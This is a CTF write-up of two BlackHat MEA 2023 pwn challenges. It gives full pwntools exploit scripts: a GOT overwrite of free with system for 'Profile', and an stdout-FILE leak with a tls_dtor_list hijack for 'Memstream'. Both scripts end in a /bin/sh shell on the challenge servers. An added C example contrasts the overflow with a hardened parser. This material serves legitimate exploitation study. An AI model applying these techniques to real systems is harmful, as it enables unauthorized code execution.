2023 BlackHat MEA Qualification CTF Pwn Writeup

A foreign CTF I had never heard of; only two pwn challenges in total.

The challenges are simple, but the vulnerability points are rather uncommon.

Profile

There is an integer overflow in the employ.age field: the value written there spills over into the employ.name pointer that sits right behind it.

This gives an arbitrary address write. Write to the GOT: overwrite free with the address of main so that the program loops back and the write can be repeated, then, in combination with the exit call that follows, overwrite free with system.

Keep the number of bytes under control, so that getline does not trigger a realloc at the end of the input and crash.
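The bug class behind the Profile challenge is a width mismatch: a 64-bit integer is parsed and stored into a 4-byte field, and the upper half of the value overwrites the low half of the pointer stored next to it. The following C program is an added example written for this writeup, not code from the challenge or from the author; the struct layout, the field names and the input value 0x1122334455667788 are constructed for illustration and are not recovered from the challenge binary. It shows the vulnerable store beside a hardened parser that validates the range and stores exactly the field's width.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed layout for illustration only (not taken from the challenge binary):
 * a 4-byte age sits directly in front of an 8-byte name pointer, so an 8-byte
 * store aimed at age spills into the low half of name. */
struct employee {
    int32_t id;
    int32_t age;
    char   *name;
};

static char default_name[] = "anonymous";

/* Vulnerable pattern: the input is parsed as a 64-bit integer and all 8 bytes are
 * stored at the address of the 4-byte field (the effect of reading "%lld" into an
 * int). The upper 4 bytes of the value overwrite the low 4 bytes of the pointer. */
void set_age_vulnerable(struct employee *e, const char *input)
{
    long long v = strtoll(input, NULL, 0);
    unsigned char *dst = (unsigned char *)e + offsetof(struct employee, age);
    memcpy(dst, &v, sizeof v);          /* 8-byte store into a 4-byte slot */
}

/* Hardened version: parse into a wide temporary, reject garbage and out-of-range
 * values, and store exactly sizeof(e->age) bytes. Returns 0 on success, -1 on rejection. */
int set_age_safe(struct employee *e, const char *input)
{
    char *end = NULL;
    errno = 0;
    long long v = strtoll(input, &end, 10);
    if (errno != 0 || end == input || *end != '\0')
        return -1;                      /* not a clean decimal integer */
    if (v < 0 || v > 150)
        return -1;                      /* outside the meaning of an age */
    e->age = (int32_t)v;                /* 4-byte store; name is untouched */
    return 0;
}

/* Low 32 bits of the name pointer, so a caller can tell whether it was disturbed. */
uint32_t name_ptr_low32(const struct employee *e)
{
    return (uint32_t)((uintptr_t)e->name & 0xffffffffu);
}

/* Constructed input 0x1122334455667788: on a little-endian machine the low word
 * 0x55667788 becomes age and the high word 0x11223344 lands in the pointer.
 * Returns 1 if the pointer was clobbered exactly as described. */
int vulnerable_clobbers_pointer(void)
{
    struct employee e = { 1, 30, default_name };
    set_age_vulnerable(&e, "0x1122334455667788");
    return (uint32_t)e.age == 0x55667788u && name_ptr_low32(&e) == 0x11223344u;
}

/* The hardened parser rejects the same input and leaves the pointer intact,
 * while still accepting an ordinary age. Returns 1 if both hold. */
int safe_rejects_overflow(void)
{
    struct employee e = { 1, 30, default_name };
    int rc_bad = set_age_safe(&e, "0x1122334455667788");
    int rc_ok  = set_age_safe(&e, "42");
    return rc_bad == -1 && rc_ok == 0 && e.age == 42 && e.name == default_name;
}

int main(void)
{
    printf("vulnerable store clobbers name pointer: %s\n",
           vulnerable_clobbers_pointer() ? "yes" : "no");
    printf("hardened parser rejects the input:      %s\n",
           safe_rejects_overflow() ? "yes" : "no");
    return 0;
}
```

The fix is not the range check alone: what closes the hole is parsing into a temporary of the input's width and then assigning to the field, so the compiler emits a store of the field's size. The range check is what turns an absurd value into a rejected input instead of a silently truncated one.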

EXP:

from pwn import *
r = remote("54.78.163.105", 31530)
#r = process('./profile')
context.log_level = 'debug'

# Each round: the age input overflows so that its high 4 bytes land in the
# employ.name pointer, then the bytes sent as the name are written through it.
r.recv()
r.sendline(str(0x4040187FFFFFFF).encode())
r.recv()
r.sendline(b"\x8c\x13\x40")


r.recv()
r.sendline(str(0x4040687FFFFFFF).encode())
r.recv()
r.sendline(b"\x8c\x13\x40")


r.recv()
r.sendline(str(0x4040187FFFFFFF).encode())
r.recv()
r.sendline(b"\x20\x11\x40")


# Leak a libc pointer through the format string.
r.recv()
r.sendline(str(0x7FFFFFFF).encode())
r.recv()
r.sendline(b"%49$p;")

r.recvuntil(b"----------------\n")
r.recvuntil(b"----------------\n")
libc_base = int(r.recvuntil(b";", drop=True), 16) - 0x2ce40
success("libc_base: " + hex(libc_base))


# Final step from the description above: point free at system.
r.recv()
#gdb.attach(r, "b getdelim")
r.sendline(str(0x4040187FFFFFFF).encode())
r.recv()
r.sendline(p64(libc_base + 0x53d60))


r.recv()
r.sendline(str(0x7FFFFFFF).encode())
r.recv()
r.sendline(b"/bin/sh")

r.interactive()

Memstream

The program is UPX-packed; unpack it directly with the tool.

At first glance it looks like an arbitrary read/write relative to the bss segment, but PIE and full RELRO are both enabled.

Going back to debug the packed version of the program, I found that because of the self-extracting nature of the packer, all of the program's segments end up in address space obtained via mmap.

That means the offset between the bss segment and libc is fixed, so the primitive becomes an arbitrary read/write inside libc.

Leak a libc address through stdout, then modify the TLS and tls_dtor_list to hijack __call_tls_dtors in the exit path.

EXP:

from pwn import *
r = remote("54.78.163.105", 30916)
#r = remote("127.0.0.1", 5000)
#r = process('./memstream')
context.log_level = 'debug'

def seek(offset):
	# Menu option 1: move the cursor to an offset relative to the bss buffer.
	r.recvuntil(b"> ")
	r.sendline(b"1")
	r.recvuntil(b": ")
	r.sendline(str(offset).encode())

def write(size, content):
	# Menu option 3: write `size` bytes at the current cursor.
	r.recvuntil(b"> ")
	r.sendline(b"3")
	r.recvuntil(b": ")
	r.sendline(str(size).encode())
	r.recvuntil(b": ")
	r.send(content)

write(0x8, b"a" * 0x8)

# Leak via the stdout FILE structure (see the comment thread below):
# set _flags, then shrink the low byte of _IO_write_base.
seek(-0x528e0)
write(0x8, p64(0xfbad1800))

seek(-0x528b8)
write(0x1, b"\x10")
r.recv(5)

libc_base = u64(r.recv(8)) - 0x21ba70
success("libc_base: " + hex(libc_base))

# Modify the TLS: zero the pointer guard.
seek(-0x26f8f0)
write(0x8, p64(0))


# Point tls_dtor_list at memory we control.
seek(-0x26f8f0 - 0x88)
write(0x8, p64(libc_base + 0x26d060))

libc = ELF("./libc.so.6")

# PTR_MANGLE with a zeroed guard is a rotate left by 0x11; for a 47-bit libc
# address that is the same as a plain shift left by 0x11.
seek(0)
write(0x10, p64(((libc_base + libc.sym["system"]) << 0x11) & 0xFFFFFFFFFFFFFFFF) + p64(libc_base + next(libc.search(b"/bin/sh"))))
r.recvuntil(b"> ")
r.sendline(b"4")

r.interactive()
The extraction password for all archives is flagyard

Attachment download

Comments

  1. MrNobody
    1 year ago
    2023-10-25 13:48:39

    Hello sir, I hope you are doing well. I want to know how you leaked the address? What exactly did you do?

    • Author
      MrNobody
      1 year ago
      2023-10-26 19:07:19

      Leak the address by modifying the _IO_2_1_stdout_ structure. Modify _flags to 0xfbad1800 and change _IO_write_base to a smaller value, and it will output the structure itself when the next printf function executes.
